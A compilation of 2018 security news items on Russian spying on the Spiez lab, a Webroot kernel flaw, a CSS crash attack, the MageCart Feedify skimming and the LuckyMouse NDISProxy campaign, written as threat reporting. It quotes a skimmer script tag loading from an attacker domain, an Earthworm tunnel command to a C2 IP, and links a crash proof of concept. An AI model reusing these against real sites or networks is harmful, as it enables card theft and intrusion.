“[The SRC] actively participated in this operation in collaboration with its Dutch and British partners in prevention of illegal actions against critical Swiss infrastructure.“

Spiez laboratory representatives confirmed to have observed hacking attempts in the last months and to have taken precautions to repeal them.

Skripal Labor Spiez

Andreas Bucher, a spokesman for the Spiez lab, told AFP that in June attackers took documents from the lab’s website and “distributed a very malicious malware virus” to affiliated agencies.

It is interesting to note that the same piece of malware was used in the attacks on the Pyeongchang Winter Olympics in South Korea.

According to The Washington Post, the incidents were caused by cyber attacks powered by hackers working at Russia’s GRU military intelligence agency that managed to take control in early February of 300 computers linked to the Olympic organization.

The cyber attacks were a retaliation against the International Olympic Committee for banning the Russian team from the Winter Games due to doping cases of Russian athletes.

In April Russia’s SVR foreign intelligence service information chief Sergei Ivanov accused the OPCW of “manipulating” the results of the Skripal case.

According to information obtained by Ivanov, the OPCW was omitting findings from the Spiez laboratory, he explained that the samples sent by the OPCW contained a nerve agent called “BZ” which was manufactured by the West.


Experts disclose a Webroot SecureAnywhere macOS Kernel Level bug found months ago
17.9.2018 securityaffairs
Apple

Security experts disclosed a locally exploitable kernel-level vulnerability in the Webroot SecureAnywhere macOS security software.
The Webroot SecureAnywhere macOS security software was affected by a locally exploitable kernel-level vulnerability. An attacker that exploit the flaw could execute malware at the “kernel level” on a vulnerable Mac system.

The vulnerability, tracked as CVE-2018-16962, was patched months ago but publicly disclosed only yesterday.

“Webroot SecureAnywhere before 9.0.8.34 on macOS mishandles access to the driver by a process that lacks root privileges.” reads the security advisory.

The flaw is difficult to trigger, it is exploitable only by a local attacker that is logged into a vulnerable Mac system or by tricking an already logged-in user into opening an exploit through social engineering.

The vulnerability was discovered by researchers at Trustwave, the flaw was caused by the lack of validation of arbitrary user-supplied pointer being read from and potentially written too.

“Email Trustwave recently discovered a locally exploitable issue in the macOS version of the Webroot SecureAnywhere solution.” reads the analysis published by Trustwave.

“The issues root cause is an arbitrary user-supplied pointer being read from and potentially written too. As such, the issue arms an attacker with a write-what-where kernel gadget with the caveat that the original value of the memory referenced by the pointer must be equal to (int) -1.”

Under certain conditions, the issue could be chained with other exploit to gain a local privilege escalation.

The researchers pointed out that the exploitability of the flaw is limited in that the original value of the memory address dereferenced must be (int) -1.

A workable exploit could be implemented bypassing the KASLR (kernel address space layout randomisation) on the versions of OSX/macOS supported by SecureAnywhere.

Webroot addressed the vulnerability since July with the release of SecureAnywhere for MacOS version 9.0.8.34. At the time of writing, there is no evidence of any compromises from this vulnerability.

Trustwave decided to disclose only now the issue for the following reason;

“It is important that the details of our research are accurate and in order. Vendors at times issue a patch faster than we post full details on findings. We often provide users with more time to apply the patch before we release technical details about a vulnerability.”

SecureAnywhere webroot

Below the statement published by Webroot:

“The security of our customers is of paramount importance to Webroot. This vulnerability was remedied in software version 9.0.8.34 which has been available for our customers since July 24, 2018. We have no evidence of any compromises from this vulnerability.

For any user running a version of Mac not currently supported by Apple (OS 10.8 or lower), we recommend upgrading to an Apple-supported version to receive our updated agent and be in line with cybersecurity best practices on system patching.

Collaboration in the cybersecurity community is what keeps us all safer. We appreciate the Trustwave SpiderLabs team’s use of responsible disclosure to help protect the wider community from cyberthreats.”


Researcher devised a new CSS & HTML attack that causes iPhone reboot or freezes Macs
17.9.2018 securityaffairs
Apple

The security researcher security researcher Sabri Haddouche from Wire devised a new CSS attack that causes iPhone reboot or freezes Macs.
The security researcher security researcher Sabri Haddouche from Wire devised a new attack method that saturates Apple device’s resources and causing it crashes or system restarts when visiting a web page. The experts discovered that iOS restart and macOS freezes when the user visits a web page that contains certain CSS & HTML.

Depending on the version of iOS being used, the bug could trigger the UI restart, cause a kernel panic and consequent device reboot.

Sabri
@pwnsdx
How to force restart any iOS device with just CSS? 💣

Source: https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea …

IF YOU WANT TO TRY (DON’T BLAME ME IF YOU CLICK) : https://cdn.rawgit.com/pwnsdx/ce64de2760996a6c432f06d612e33aea/raw/23f2faa0aadb4babbfd228c8bb32a26a8c51c741/safari-ripper.html …

2:45 PM - Sep 15, 2018

Safari Ripper ☠️
Safari Ripper ☠️. GitHub Gist: instantly share code, notes, and snippets.

gist.github.com
1,866
1,389 people are talking about this
Twitter Ads info and privacy
This attack leverages a weakness in the -webkit-backdrop-filter CSS, for this reason, it affects all browsers on iOS that leverage on WebKit as rendering engine is WebKit. The weakness also affects Safari and Mail in macOS, but it doesn’t affect Linux and Windows systems.

“The attack exploits a weakness in the –webkit-backdrop-filter CSS property,” Haddouche explained to BleepingComputer. “By using nested divs with that property, we can quickly consume all graphic resources and crash or freeze the OS. The attack does not require Javascript to be enabled therefore it also works in Mail. On macOS, the UI freeze. On iOS, the device restart.”

iphone

Haddouche successfully tested the attack on iOS 12 and caused the device to reboot, on iOS 11.4.1 it only caused a UI restart.

Haddouche explained that on macOS, the attack will only cause Mail and Safari to freeze for a second and then slow down the computer.

Haddouche also devised another attack that uses HTML, CSS, and JavaScript to completely freeze macOS systems. The researchers told Bleeping Computer that he has not disclosed it because it persists after reboot and macOS will relaunch Safari with the malicious page, causing the system entering in a look that freeze it again.

Lawrence Abrams from Bleeping Computer created a video showing what happens when a user visits the attack page created by Haddouche (sees the rawgit[.]com) and published on Github. Lawrence used an iPhone running iOS 11.4.1.

The bad news is that there is no mitigation for this attack.


Feedify cloud service architecture compromised by MageCart crime gang
17.9.2018 securityaffairs
CyberCrime

MageCart cyber gang compromised the cloud service firm Feedify and stole payment card data from customers of hundreds of e-commerce sites.
MageCart crime gang appears very active in this period, payment card data from customers of hundreds of e-commerce websites may have been stolen due to the compromise of the cloud service firm Feedify.

Cloud service firm Feedify has over 4,000 customers, it is a cloud platform to engage customers’ clients with powerful tools that target them based on their behavior.

Feedify leverages a JavaScript script that their customers add to their websites to use the service. MageCart hackers compromised the supply chain for the Feedify service. The script loads various resources from Feedify’s infrastructure, including a library named “feedbackembad-min-1.0.js,” which was compromised by MageCart.

Feedify

Every user a page of the e-commerce site of a Feedify customer will load the malicious script that allowed the crooks to siphon personal information and payment card data.

Yonathan Klijnsma

@ydklijnsma
They've been affected by Magecart since Friday, August 17 2018 @ 16:51:01 GMT as we recorded it.

Placebo
@Placebo52510486
Magecart on Feedify. A customer engagement tool. According to there website 4000+ website use there tooling/code. Fixed today after I notified them.@ydklijnsma @GossiTheDog

View image on TwitterView image on Twitter

10:05 PM - Sep 11, 2018
15
See Yonathan Klijnsma's other Tweets
Twitter Ads info and privacy
The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script in the target websites to siphon payment card data, once the attackers succeed in compromising a site, it will add an embedded piece of Javascript to the HTML template. Below an example script dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>
This script records keystrokes from customers and sends them to a server controlled by the attacker.

Typically hackers attempt to compromise third-party features that could allow them to access a large number of websites.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against the British Airways and used a customized version of the script to remain under the radar.

Using the same tactic, the MageCart compromised the website using the Feedify service by injecting their malicious code into a library the Feedify script served to customers’ websites.

According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.

Once notified Feedify the compromise, the company removed the malicious script:

View image on TwitterView image on TwitterView image on Twitter

Placebo
@Placebo52510486
Magecart on Feedify. A customer engagement tool. According to there website 4000+ website use there tooling/code. Fixed today after I notified them.@ydklijnsma @GossiTheDog

8:42 PM - Sep 11, 2018
32
29 people are talking about this
Twitter Ads info and privacy
but apparently, the hackers re-infected the library.

Yonathan Klijnsma

@ydklijnsma
FYI: Feedify is re-infected with Magecart since about an hour ago, exact time of infection is: Wed, 12 Sep 2018 14:16:02 GMT.

URL: hxxps://cdn[.]feedify[.]net/getjs/feedbackembad-min-1.0.js

/cc @Placebo52510486 @GossiTheDog @_feedify

Yonathan Klijnsma

@ydklijnsma
They've been affected by Magecart since Friday, August 17 2018 @ 16:51:01 GMT as we recorded it. https://twitter.com/Placebo52510486/status/1039585013057118209 …

5:22 PM - Sep 12, 2018
15
See Yonathan Klijnsma's other Tweets
Twitter Ads info and privacy
The events demonstrate the ability of the MageCart crime gang in compromising the infrastructure of its victims.

In August, security expert Willem de Groot discovered that the MagentoCore skimmer at the time already infected 7,339 Magento stores.

At the time, querying the PublicWWW service it was possible to verify that the MagentoCore script was deployed on 5,214 domains, actually the number of compromised website id still high (4762) despite the awareness campaign.


LuckyMouse signs malicious NDISProxy driver with certificate of Chinese IT company
16.9.2018 Kaspersky
Virus

What happened?
Since March 2018 we have discovered several infections where a previously unknown Trojan was injected into the lsass.exe system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT.

The campaign described in this report was active immediately prior to Central Asian high-level meeting and we suppose that actor behind still follows regional political agenda.

Which malicious modules are used?
The malware consists of three different modules:

A custom C++ installer that decrypts and drops the driver file in the corresponding system directory, creates a Windows autorun service for driver persistence and adds the encrypted in-memory Trojan to the system registry.
A network filtering driver (NDISProxy) that decrypts and injects the Trojan into memory and filters port 3389 (Remote Desktop Protocol, RDP) traffic in order to insert the Trojan’s C2 communications into it.
A last-stage C++ Trojan acting as HTTPS server that works together with the driver. It waits passively for communications from its C2, with two possible communication channels via ports 3389 and 443.

NDISProxy driver and RAT work together once the installer has set up all the modules

These modules allow attackers to silently move laterally in the infected infrastructure, but don’t allow them to communicate with an external C2 if the new infected host only has a LAN IP. Because of this, the operators used an Earthworm SOCKS tunneler in order to connect the LAN of the infected host to the external C2. They also used the Scanline network scanner to find file shares (port 135, Server Message Block, SMB) which they use to spread malware with administrative passwords, compromised with keyloggers.

We assess with high confidence that NDISProxy is a new tool used by LuckyMouse. Kaspersky Lab products detect the described artefacts. For more information please contact: intelreports@kaspersky.com

How does it spread?
We detected the distribution of the 32-bit dropper used for this campaign among different targets by the end of March 2018. However, we didn’t observe any spear phishing or watering hole activity. We believe the operators spread their infectors through networks that were already compromised instead.

How does it work?
Custom installer
Installer MD5 hash Timestamp (GMT) Size Bits
dacedff98035f80711c61bc47e83b61d 2018.03.29 07:35:55 572 244 32
9dc209f66da77858e362e624d0be86b3 2018.03.26 04:16:00 572 244 32
3cbeda2c5ac41cca0b0d60376a2b2511 2018.03.26 04:16:00 307 200 32
The initial infectors are 32-bit portable executable files capable of installing 32-bit or 64-bit drivers depending on the target. The installer logs all the installation process steps in the load.log file within the same directory. It checks if the OS is Windows Vista or above (major version equal to 6 or higher) and decrypts its initial configuration using the DES (Data Encryption Standard) algorithm.

The set of well-known port numbers (HTTP, HTTPS, SMB, POP3S, MSSQL, PPTP and RDP) in the configuration is not used, which along with the “[test]” strings in messages suggests this malware is still under development.

The installer creates a semaphore (name depending on configuration) Global\Door-ndisproxy-mn and checks if the service (name also depends on configuration) ndisproxy-mn is already installed. If it is, the dropper writes “door detected” in load.log. The autorun Windows service running NDISProxy is the “door” in developer terms.

The installer also decrypts (using the same DES) the shellcode of the last stage Trojan and saves it in three registry values named xxx0, xxx1, xxx2 in key HKLM\SOFTWARE\Classes\32ndisproxy-mn (or 64ndisproxy-mn for 64-bit hosts). The encrypted configuration is saved as the value filterpd-ndisproxy-mn in the registry key HKCR\ndisproxy-mn.

Initial installer saves XOR-encrypted Trojan’s shellcode and DES-encrypted configuration in system registry

The installer creates the corresponding autostart service and registry keys. The “Altitude” registry value (unique ID for the minifilter driver) is set to 321 000, which means “FSFilter Anti-Virus” in Windows terms:

NDISProxy network filtering driver
Driver MD5 hash Timestamp Size Bits
8e6d87eadb27b74852bd5a19062e52ed 2018.03.29 07:33:58 40400 64
d21de00f981bb6b5094f9c3dfa0be533 2018.03.29 07:33:52 33744 32
a2eb59414823ae00d53ca05272168006 2018.03.26 04:15:28 40400 64
493167e85e45363d09495d0841c30648 2018.03.26 04:15:21 33744 32
ad07b44578fa47e7de0df42a8b7f8d2d 2017.11.08 08:04:50 241616 64
This digitally signed driver is the most interesting artefact used in this campaign. The network filtering modules serve two purposes: first they decrypt and inject the RAT; second, they set its communication channel through RDP port 3389.

The drivers are signed with a digital certificate issued by VeriSign to LeagSoft, a company developing information security software such as data loss prevention (DLP) solutions.

This driver makes extensive use of third-party publicly available C source code, including from the Blackbone repository available at GitHub.

Feature Public repository
Driver memory injection Blackbone https://github.com/DarthTon/Blackbone
NDIS network filtering driver Microsoft Windows Driver Kit (WDK) sample code “Windows Filtering Platform Stream Edit Sample/C++/sys/stream_callout.c”
Parse HTTP packets Http-parser https://github.com/nodejs/http-parser
The driver again checks if the Windows version is higher than Vista, then creates a device named \\Device\\ndisproxy-%s (where the word after “-” varies – see Appendix for all variants) and its corresponding symbolic link \\DosDevices\\Global\\ndisproxy-%s.

The driver combines all the Trojan-related registry values from HKLM\SOFTWARE\Classes\32ndisproxy-mn and de-XORs them with a six-byte hardcoded value. It then injects the resulting Trojan executable shellcode into lsass.exe memory using Blackbone library functions.

NDISProxy works as a network traffic filter engine, filtering the traffic going through RDP port 3389 (the port number is hardcoded) and injecting messages into it.

The communication between the user-mode in-memory Trojan and the driver goes through the custom control codes used by the DeviceIoControl() Windows API function. Apart from the auxiliary codes, there are two codes worth mentioning:

Driver control code Meaning
0x222400 Start traffic filtering at RDP port 3389
0x22240C Inject given data into filtering TCP stream. Used for Trojan communication with C2
In-memory C++ Trojan
SHA256 c69121a994ea8ff188510f41890208625710870af9a06b005db817934b517bc1
MD5 6a352c3e55e8ae5ed39dc1be7fb964b1
Compiled 2018.03.26 04:15:48 (GMT)
Type I386 Windows GUI DLL
Size 175 616
Please note this Trojan exists in memory only; the data above is for the decrypted Windows registry content without the initial shellcode

This RAT is decrypted by the NDISProxy driver from the system registry and injected into the lsass.exe process memory. Code starts with a shellcode – instead of typical Windows portable executable files loader this malware implements memory mapping by itself.

This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands.

The Trojan is an HTTP server, allowing LAN connection. It uses a SOCKS tunneler to communicate with the C2

This Trojan is used by attackers to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler. This tool is publicly available and popular among Chinese-speaking actors. Given that the Trojan is an HTTPS server itself, we believe that the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.

Who’s behind it and why?
We found that this campaign targeted Middle Asian governments’ entities. We believe the attack was highly targeted and was linked to a high-level meeting. We assess with high confidence that the Chinese-speaking LuckyMouse actor is responsible for this new campaign using the NDISProxy tool described in this report.

In particular, the choice of the Earthworm tunneler is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (“-s rssocks -d 103.75.190[.]28 -e 443”) creates a tunnel to a previously known LuckyMouse C2. The choice of victims in this campaign also aligns with the previous interests shown by this actor.

Consistent with current trends
We have observed a gradual shift in several Chinese-speaking campaigns towards a combination of publicly available tools (such as Metasploit or CobaltStrike) and custom malware (like the C++ last stage RAT described in this report). We have also observed how different actors adopt code from GitHub repositories on a regular basis. All this combines to make attribution more difficult.

This campaign appears to demonstrate once again LuckyMouse’s interest in Central Asia and the political agenda surrounding the Shanghai Cooperation Organization.

Indicators of Compromise
Note: The indicators in this section are valid at the time of publication. Any future changes will be updated directly in the corresponding .ioc file.

File Hashes
Droppers-installers
9dc209f66da77858e362e624d0be86b3
dacedff98035f80711c61bc47e83b61d

Drivers
8e6d87eadb27b74852bd5a19062e52ed
d21de00f981bb6b5094f9c3dfa0be533
a2eb59414823ae00d53ca05272168006
493167e85e45363d09495d0841c30648
ad07b44578fa47e7de0df42a8b7f8d2d

Auxiliary Earthworm SOCKS tunneler and Scanline network scanner
83c5ff660f2900677e537f9500579965
3a97d9b6f17754dcd38ca7fc89caab04

Domains and IPs
103.75.190[.]28
213.109.87[.]58

Semaphores
Global\Door-ndisproxy-mn
Global\Door-ndisproxy-help
Global\Door-ndisproxy-notify

Services
ndisproxy-mn
ndisproxy-help
ndisproxy-notify

Registry keys and values
HKLM\SOFTWARE\Classes\32ndisproxy-mn
HKLM\SOFTWARE\Classes\64ndisproxy-mn
HKCR\ndisproxy-mn\filterpd-ndisproxy-mn
HKLM\SOFTWARE\Classes\32ndisproxy-help
HKLM\SOFTWARE\Classes\64ndisproxy-help
HKCR\ndisproxy-mn\filterpd-ndisproxy-help
HKLM\SOFTWARE\Classes\32ndisproxy-notify
HKLM\SOFTWARE\Classes\64ndisproxy-notify
HKCR\ndisproxy-mn\filterpd-ndisproxy-notify

Driver certificate
A lot of legitimate LeagSoft products are signed with the following certificate. Please don’t consider all signed files as malicious.

Subject ShenZhen LeagSoft Technology Co.,Ltd.
Serial number 78 62 07 2d dc 75 9e 5f 6a 61 4b e9 b9 3b d5 21
Issuer VeriSign Class 3 Code Signing 2010 CA
Valid to 2018-07-19


German Troops Face Russian 'Hybrid War' in Lithuania: Merkel
15.9.2018 securityweek BigBrothers

German Chancellor Angela Merkel said Friday Berlin was boosting military cyber capabilities to respond to Russian hybrid warfare that is targeting its troops deployed on NATO's eastern flank.

"Here you are also confronted with a situation that represents another part of the Russian military doctrine: the idea of hybrid warfare," she told German troops stationed in Lithuania as part of a NATO force deployed to deter Russia.

NATO allies have accused Russia of using "hybrid warfare" techniques, including subversion, propaganda and cyber warfare, to undermine the West without triggering a full NATO military response.

Russia has repeatedly denied that it stages such attacks and has accused the US-led alliance of provoking an arms race.

"Hybrid warfare is not something that we are very used to. You clearly experience this here in very specific ways," Merkel added, without elaborating.

"It is not for nothing that we built in Germany a special cyber unit within the German military in order to build capabilities in this area," she told troops at their base in Rukla, northwest of the capital Vilnius.

Last year, Germany deployed over 500 troops in Lithuania as part of a NATO mission to reassure eastern allies and deter Russia.

Soon after their arrival, German troops were subjected to false rape accusations while media reports said Moscow also targeted NATO soldiers' smartphones.

Fears that Russia could attempt to attack NATO's ex-communist states surged after Moscow's 2014 annexation of Crimea from Ukraine, a move that sent East-West relations to their lowest point since the Cold War.

Besides Lithuania, 1,000-strong NATO battalions were also deployed in fellow Baltic states Latvia and Estonia and neighbouring Poland.


Trump OKs Sanctions for Foreigners Who Meddle in Elections
15.9.2018 securityweek BigBrothers

President Donald Trump signed an executive order Wednesday authorizing sanctions against foreigners who meddle in U.S. elections, acting amid criticism that he has not taken election security seriously enough.

“We felt it was important to demonstrate the president has taken command of this issue, that it’s something he cares deeply about — that the integrity of our elections and our constitutional process are a high priority to him,” said national security adviser John Bolton.

In the order, the president declared a national emergency, an action required under sanctions authority, to deal with the threat of foreign meddling in U.S. elections.

The order calls for sanctioning any individual, company or country that interferes with campaign infrastructure, such as voter registration databases, voting machines and equipment used for tabulating or transmitting results. It also authorizes sanctions for engaging in covert, fraudulent or deceptive activities, such as distributing disinformation or propaganda, to influence or undermine confidence in U.S. elections.

It requires the national intelligence director to make regular assessments about foreign interference and asks the Homeland Security and Justice departments to submit reports on meddling in campaign-related infrastructure. It also lays out how the Treasury and State departments will recommend what sanctions to impose.

With the midterm elections now two months away, National Intelligence Director Dan Coats said the U.S. is not currently seeing the intensity of Russian intervention that was experienced in 2016, but he didn’t rule it out. He said the U.S. is also worried about the cyber activities of China, North Korea and Iran.

Coats said Trump’s order directs intelligence agencies to conduct an assessment within 45 days after an election to report any meddling to the attorney general and Department of Homeland Security. The attorney general and Department of Homeland Security then have another 45 days to assess whether sanctions should be imposed.

“This clearly is a process put in place to try to assure that we are doing every possible thing we can, first of all, to prevent any interference with our elections, to report on anything we see between now and the election, but then to do a full assessment after the election to assure the American people just exactly what may have happened or may not have happened,” Coats said.

Sen. Marco Rubio, R-Fla., and Sen. Chris Van Hollen, D-Md., are pushing a bill that would prohibit foreign governments from purchasing election ads, using social media to spread false information or disrupting election infrastructure. They said Trump’s order recognizes the threat, but doesn’t go far enough.

The order gives the executive branch the discretion to impose sanctions for election meddling, but the bill would spell out sanctions on key economic sectors of a country that interferes. Those backing the legislation say that under the bill, a nation would know exactly what it would face if caught.

Virginia Sen. Mark Warner, ranking Democrat on the Senate intelligence committee, said the order leaves the president with broad discretion to decide whether to impose tough sanctions. “Unfortunately, President Trump demonstrated in Helsinki and elsewhere that he simply cannot be counted upon to stand up to (Russian President Vladimir) Putin when it matters,” said Warner, who is sponsoring the bill.

At a July 16 news conference with Putin in Helsinki, Trump was asked if he would denounce what happened in 2016 and warn Putin never to do it again. Trump did not directly answer the question. Instead, he delivered a rambling response, including demands for investigation of Hillary Clinton’s email server and his description of Putin’s “extremely strong and powerful” denial of meddling.

That drew outrage from both Republican and Democrats.

Trump has pushed back, saying that no other American president has been as tough on Russia. He has cited U.S. sanctions and the expulsion of alleged Russian spies from the U.S.

Mike Rogers, former director of the National Security Agency, said he thought Trump missed an opportunity in Helsinki to publicly scold Russia for meddling. Rogers said when he used to talk to Trump about the issue, Trump would often respond to him, saying “Mike, you know, I’m in a different place.”

Rogers said he would tell Trump: “Mr. President, I understand that, but I’m paid by the citizens of the nation to tell you what we think. Sir, this is not about politics, it’s not about parties. It’s about a foreign state that is attempting to subvert the very tenets of our structure.”

In his first public comments since he retired in June, Rogers said: “That should concern us as citizens. That should concern us leaders. And if we don’t do something, they (the Russians) are not going to stop.”

Rogers, who spoke Tuesday night at the Hayden Center at George Mason University in Virginia, also said earlier media reports claiming Trump had asked him to publicly deny any collusion between Moscow and Trump’s campaign were inaccurate.

James Clapper, the former national intelligence director who appeared with Rogers and other former intelligence officials, said he personally believes that the Russian interference did influence the outcome of the 2016 election, but didn’t elaborate.

“The Russians are still at it. They are committed to undermining our system,” Clapper said. “One of the things that really disturbs me is — that for whatever reason, I don’t know what it is — the president’s failure to dime out Putin and dime out the Russians for what they are doing.”


How Apple's Safari Browser Will Try to Thwart Data Tracking
15.9.2018 securityweek Apple

New privacy features in Apple's Safari browser seek to make it tougher for companies such as Facebook to track you.

Companies have long used cookies to remember your past visits. This can be helpful for saving sign-in details and preferences. But now they're also being used to profile you in order to fine-tune advertising to your tastes and interests.

Cookie use goes beyond visiting a particular website. As other sites embed Facebook "like" and "share" buttons, for instance, Facebook's servers are being pinged and can access your stored cookies. That means Facebook now knows you frequent celebrity gossip sites or read news with a certain political bent. Ads can be tailored to that.

Here's how Safari is getting tougher in dealing with that.

NO MORE GRACE PERIOD

Safari used to wait 24 hours from your last visit to a service before blocking that service's cookies on third-party sites. That effectively exempted Facebook, Google and other services that people visited daily. Now, Safari will either block the cookie automatically or prompt you for permission.

Apple says Safari will still be able to remember sign-in details and other preferences, though some websites have had to adjust their coding.

THWARTING FINGERPRINTING

Browsers typically reveal seemingly innocuous information about your device, such as the operating system used and fonts installed. Websites use this to make minor adjustments in formatting so that pages display properly.

Browsers have historically made a lot of information available, largely because it seemed harmless. Now it's clear that all this data, taken together, can be used to uniquely identify you. Safari will now hide many of those specifics so that you will look no different from the rest.

It's like a system that digitally blurs someone's image, said Lance Cottrell, creator of the privacy service Anonymizer. "You can tell it's a person and not a dog, but you can't recognize a person's face," he said.

For instance, Safari will reveal only the fonts that ship with the machine, not any custom fonts installed.

MASKING WEB ADDRESSES

When visiting a website, the browser usually sends the web address for the page you were just on. This address can be quite detailed and reveal the specific product you were exploring at an e-commerce site, for instance.

Now, Safari will just pass on the main domain name for that site. So it would be just "Amazon.com" rather than the specific product page at Amazon.

CLOSING A LOOPHOLE

Some ad companies have sought to bypass restrictions on third-party cookies — that is, identifiers left by advertisers — by using a trick that routed them through a series of websites. That could make a third-party cookie look like it belonged to a site you're visiting. Safari will now try to catch that.

The changes come Tuesday as part of the iOS 12 update for iPhones and iPads and a week later in the Mojave update for Mac computers.

Many of the safeguards will be limited to cookies that Apple deems to be trackers. That's being done to reduce the likelihood of inadvertently blocking legitimate third-party cookies.


Secureworks Launches New Security Maturity Model
15.9.2018 securityweek Security

Secureworks has launched the Secureworks Security Maturity Model. It is released, announces Secureworks, in response to "research which shows that more than one-third of US organizations (37%) face security risks that exceed their overall security maturity. Within that group, 10% face a significant deficiency when it comes to protecting themselves from the threats in their environment."

Secureworks is offering a complementary evaluation (an online process supported by a security expert) to help organizations benchmark their own security maturity. The model incorporates elements of well-known frameworks like National Institute of Standards and Technology (NIST) and ISO 27001/02 with insight from Secureworks' global threat intelligence. It comprises four levels: guarded, informed, integrated and resilient.

Further information, and a route map for attaining security maturity, can be found in a white paper titled '5 Critical Steps to a More Mature Security Posture' (PDF). This paper suffers from one major drawback: security leaders who have achieved the title or function of CISO in a major organization will already know and understand everything contained in the paper.

It does, however, lay out the necessary steps for achieving greater maturity that would be useful for security officers that are either new to their function, or are employed by small organizations.

But there remains what is possibly a fundamental flaw. The very first step for the CISO is to "Agree on business needs, objectives and tolerance". The paper provides no solution on how that agreement can be reached; but agreement is the very basis of aligning security efforts with business priorities -- and is possibly the biggest difficulty faced by CISOs.

The problem is that defining risk is a business problem. Setting risk tolerance levels is ultimately a CEO function. The CISO function is to mitigate risk up to the tolerance level. The CISO's difficulty is getting accurate and timely information from the business -- with adequate budget -- in order to mitigate the risk. How to achieve this is possibly the biggest weakness for any maturity model, and is not resolved in the Secureworks white paper.

The paper gives an example: "The CIO determines that the business need is to 'introduce controls to reduce the risk of lost or stolen PII which subsequently reduces the chance of a data breach occurring and hence breaching government regulation.' This is more than just saying ëstop the organization being hackedí as it provides the need, the requirement and the consequences of not acting."

But the instruction comes downward. If the CIO doesn't give that instruction, the CISO isn't aware of the requirement -- unless he or she proactively ensures that he or she is independently aware of the need by fully understanding the business beforehand. This is one of security's biggest problems -- how to fully engage with business leadership so that the business side understands what security can and is doing, and that security understands what business needs (which can still be overridden at Board-level when setting risk tolerance levels).

A real-life example could potentially be seen in any large hypothetical tech giant that collects and keeps personal European data. There have been European laws requiring safe storage of personal data for decades. The regulatory sanctions on breach of those laws -- before GDPR -- were minor. A CISO could assume, this is the law, I must comply. The business leaders could override this and covertly say we can accept the risk and ultimately pay any fines out of petty cash. It is not for a CISO to make such decisions on risk tolerance; but the CISO must necessarily understand the business thinking.

There is no easy solution to this without the CISO getting the CEO on board, and the CEO giving the CISO authority to demand that business leaders engage fully with the security team. The extent of the problem was highlighted in a recent survey by Varonis. Nearly all security teams (96%) believe that their security planning is aligned with business risk, but far fewer (73%) of business leaders agree. Similarly, while 94% of the security teams believe that business acts on what they say, only 76% of the business leaders agreed.

There is no doubt that some organizations have solved this problem by having a business-enlightened CISO and a security-enlightened CEO. In such circumstances, the organization will probably already have achieved a high security maturity score. Going through the Secureworks security maturity model process will still be a useful process. The graphs and details will provide verification of existing practices and may highlight anything still missing.

Where the relationship between business and security does not yet exist, it will need to be solved before the model becomes useful.

It should be said however, that the process towards more mature security as outlined by Secureworks provides a valuable checklist of security processes. The irony is that the same paper warns, "Emerging, high profile issues like ransomware often trigger a reactive posture where the emphasis is on reviewing a checklist of specific 'known' threats and risks. In fact, being resilient to a breach is dependent on an integrated set of solutions and controls, instrumented for visibility across the whole environment, and made effective by people who follow the right policy, process and procedures to manage them." Conforming to checklists does not provide security.

Secureworks was founded in 1998 by Michael Pearson and Joan Wilbanks. It was acquired by Dell and became Dell Secureworks in 2011. It left Dell and became a public company (majority owned by Dell) in 2016.


China-linked APT10 Hackers Update Attack Techniques
15.9.2018 securityweek APT

Recently attacks launched by the China-linked threat actor APT10 against the Japanese media sector revealed the use of updated tactics, techniques and procedures (TTPs), FireEye says.

Also known as menuPass and Stone Panda, which FireEye has been tracking since 2009, the group has a history of targeting Japanese entities. Last year, the group targeted entities in at least fourteen countries, including the website of a prominent U.S. trade association.

As part of the new attacks, spear-phishing emails carrying malicious Word documents that attempt to deliver the UPPERCUT backdoor. Known in the security community as ANEL, the malware was apparently in pre-release form (beta or release candidate) until recently, FireEye’s security researchers say.

The documents carry a malicious VBA macro and use Japanese titles related to maritime, diplomatic, and North Korean issues (but have unreadable contents). The documents were password protected, with the password provided in the email body.

Recent UPPERCUT samples have the timestamps overwritten and filled with zeroes and the security researchers do not have visibility into the UPPERCUT 5.2.x series, but say that minor versions might have been released every few months between December 2017 and May 2018.

The latest version also features randomized exported function names and was observed sending an error code in the Cookie header when failing to receive the HTTP response from the command and control (C&C) server. For each C&C address, the malware now has uniquely hard-coded keys it uses for encryption.

Furthermore, in the generated network traffic, the encoded proxy information has been added in the URL query values during the C&C communication, FireEye said.

The commands supported in the new version include: download and validate file; upload file to the C&C; load PE file; download, validate, execute file, and send output to C&C server; format the current timestamp; capture the desktop screenshot in PNG format and send it to C&C; execute received buffer via cmd.exe and send the output to the server.

“While APT10 consistently targets the same geolocation and industry, the malware they use is actively evolving. In the newer versions of UPPERCUT, there is a significant change in the way backdoor initializes the Blowfish encryption key, which makes it harder for analysts to detect and decrypt the backdoor’s network communications. This shows that APT10 is very capable of maintaining and updating their malware,” FireEye concludes.


Russian Spies Arrested on Suspicion of Plans to Hack Swiss Laboratory
15.9.2018 securityweek CyberSpy

Dutch 'Expelled Two Russian Spies Over Novichok Lab Plot'

Dutch intelligence services arrested two alleged Russian spies on suspicion of planning to hack a Swiss laboratory investigating the poisoning of double agent Sergei Skripal, reports and officials said Friday.

The two agents, believed to be working for Russia's GRU military intelligence service, targeted the Spiez laboratory near Bern, Dutch-based NRC newspaper and Swiss daily Tages-Anzeiger said.

They were arrested earlier this year and then expelled by the Netherlands, they said.

But Russian Foreign Minister Sergei Lavrov condemned the reports, saying he could not believe the arrests would have not have been picked up at the time by the media.

The two were detained "early this year" by Dutch military intelligence (MIVD) working together with several other countries, and then expelled from the Netherlands, the newspapers reported.

"The duo, according to sources within the investigation, carried equipment which they wanted to use to break into the computer network" of the Spiez laboratory.

